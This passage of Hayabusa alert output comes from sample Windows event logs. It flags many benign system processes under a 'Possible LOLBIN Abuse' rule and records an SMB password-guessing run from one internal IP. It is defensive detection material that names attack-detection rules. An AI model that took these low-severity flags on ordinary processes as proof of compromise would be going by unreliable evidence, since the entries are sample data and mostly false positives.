9932016-09-18 07:57:04.729 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9942016-09-18 07:57:05.547 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9952016-09-18 08:05:28.818 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9962016-09-18 08:05:29.021 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9972016-09-19 23:56:52.614 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9982016-09-19 23:56:53.723 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9992016-09-19 23:56:53.973 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10002016-09-19 23:56:55.848 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\RunDll32.exe" "C:\Windows\system32\WerConCpl.dll", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10012016-09-19 23:57:03.208 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10022016-09-19 23:57:32.774 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10032016-09-19 23:57:36.030 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10042016-09-20 00:09:39.097 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10052016-09-20 00:09:42.379 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10062016-09-20 00:10:22.816 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10072016-09-20 00:10:26.441 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10082016-09-20 00:12:04.478 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10092016-09-20 00:12:15.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10102016-09-20 00:13:03.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10112016-09-20 00:13:04.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10122016-09-20 00:13:05.430 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10132016-09-20 00:13:05.758 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10142016-09-20 00:13:06.461 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10152016-09-20 00:13:14.758 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10162016-09-20 00:13:14.868 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10172016-09-20 00:13:18.164 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Wallpaper\autologon.bat" " | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590frules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10182016-09-20 00:13:18.465 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590frules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10192016-09-20 00:13:20.357 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10202016-09-20 00:13:40.443 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10212016-09-20 00:13:40.474 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10222016-09-20 00:14:08.521 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10232016-09-20 00:14:09.193 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10242016-09-20 00:15:06.588 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10252016-09-20 00:15:06.635 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10262016-09-20 00:21:37.109 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10272016-09-20 00:21:40.687 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10282016-09-20 00:26:11.578 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10292016-09-20 00:26:16.078 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\RunDll32.exe" "C:\Windows\system32\WerConCpl.dll", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593drules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10302016-09-20 00:26:42.937 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590frules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10312016-09-20 00:45:37.636 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10322016-09-20 01:36:17.350 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
10332016-09-20 01:50:06.477 +09:00DESKTOP-M5SN04R4625infoLogon Failure - User Does Not ExistUser: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10342016-09-20 01:50:06.513 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10352016-09-20 01:50:06.513 +09:00--mediumCredAccessPassword Guessing Attack[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5mrules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml-
10362016-09-20 01:50:06.588 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10372016-09-20 01:50:06.637 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10382016-09-20 01:50:06.680 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10392016-09-20 01:50:06.725 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10402016-09-20 01:50:06.773 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10412016-09-20 01:50:06.816 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10422016-09-20 01:50:06.869 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10432016-09-20 01:50:06.909 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10442016-09-20 01:50:06.977 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10452016-09-20 01:50:07.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10462016-09-20 01:50:07.052 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10472016-09-20 01:50:07.091 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10482016-09-20 01:50:07.136 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10492016-09-20 01:50:07.169 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10502016-09-20 01:50:07.217 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10512016-09-20 01:50:07.262 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10522016-09-20 01:50:07.297 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10532016-09-20 01:50:07.343 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10542016-09-20 01:50:07.393 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10552016-09-20 01:50:07.444 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10562016-09-20 01:50:07.484 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10572016-09-20 01:50:07.520 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10582016-09-20 01:50:07.551 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10592016-09-20 01:50:07.590 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10602016-09-20 01:50:07.631 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
